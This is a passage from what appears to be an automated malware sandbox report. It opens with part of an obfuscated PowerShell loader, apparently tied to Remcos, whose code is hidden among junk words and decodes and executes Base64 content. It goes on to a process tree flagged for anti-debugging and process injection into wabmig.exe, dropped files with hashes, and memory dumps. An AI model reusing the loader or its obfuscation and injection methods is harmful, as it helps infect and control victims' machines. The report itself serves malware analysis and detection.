Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3028
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1676
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:916

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      a639d074364523872ddad9e6ad2c3fdc

      SHA1

      c215a6619adb413e92af15baa77833b5c0c4f639

      SHA256

      c2d3745c301967528cd8c7903a87aac201b1ae3238035abdd9275c578149f5a8

      SHA512

      13ccd1b2e1dfdc7508007d2c6b16c2dd27280615ad95d8af7653c71bef17322eb1f52471fce480804ae0e7611b996bf3263aa3e69e9f2cacde97e38e2ecc41e5

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_paaiuj3j.k32.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Financiered.adv
      Filesize

      473KB

      MD5

      2a226c84235f25cf9bee2bade90f7fc9

      SHA1

      c449226b64715a81000c566e37677b25953a7e4a

      SHA256

      d18add82262d9ddf210db5843c8a35b049e7d150c204bf22a77e9bd546f7eda3

      SHA512

      e57f9f378a53ab77e7306efb81aa806462353121ea3b0a4c8ae7549be1bdf00ea224d1f20e10956ba31cc8b6c63264193f6c2dfdf7e958747d8aa26cc0008be7

      Download Submit

    • memory/916-59-0x0000000002060000-0x0000000005544000-memory.dmp

      Filesize

      52.9MB

      Download

    • memory/916-58-0x0000000000E00000-0x0000000002054000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/916-44-0x0000000002060000-0x0000000005544000-memory.dmp

      Filesize

      52.9MB

      Download

    • memory/3028-40-0x0000000008A80000-0x0000000009024000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3028-36-0x0000000007E50000-0x00000000084CA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3028-18-0x00000000057F0000-0x0000000005E18000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3028-19-0x0000000005710000-0x0000000005732000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3028-20-0x0000000005E20000-0x0000000005E86000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3028-21-0x0000000005E90000-0x0000000005EF6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3028-31-0x00000000060C0000-0x0000000006414000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3028-42-0x0000000009030000-0x000000000C514000-memory.dmp

      Filesize

      52.9MB

      Download

    • memory/3028-39-0x0000000007810000-0x0000000007832000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3028-34-0x00000000065E0000-0x00000000065FE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3028-35-0x0000000006630000-0x000000000667C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3028-17-0x0000000002D10000-0x0000000002D46000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3028-37-0x0000000006B90000-0x0000000006BAA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3028-38-0x0000000007880000-0x0000000007916000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3712-33-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-0-0x00007FF96DB83000-0x00007FF96DB85000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3712-16-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-32-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-43-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-15-0x00007FF96DB83000-0x00007FF96DB85000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3712-12-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-11-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-62-0x00007FF96DB80000-0x00007FF96E641000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3712-6-0x0000022446500000-0x0000022446522000-memory.dmp

      Filesize

      136KB

      Download